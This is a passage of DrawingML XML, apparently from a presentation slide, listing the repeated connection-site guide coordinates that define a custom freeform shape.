              <a:gd name="connsiteX77" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
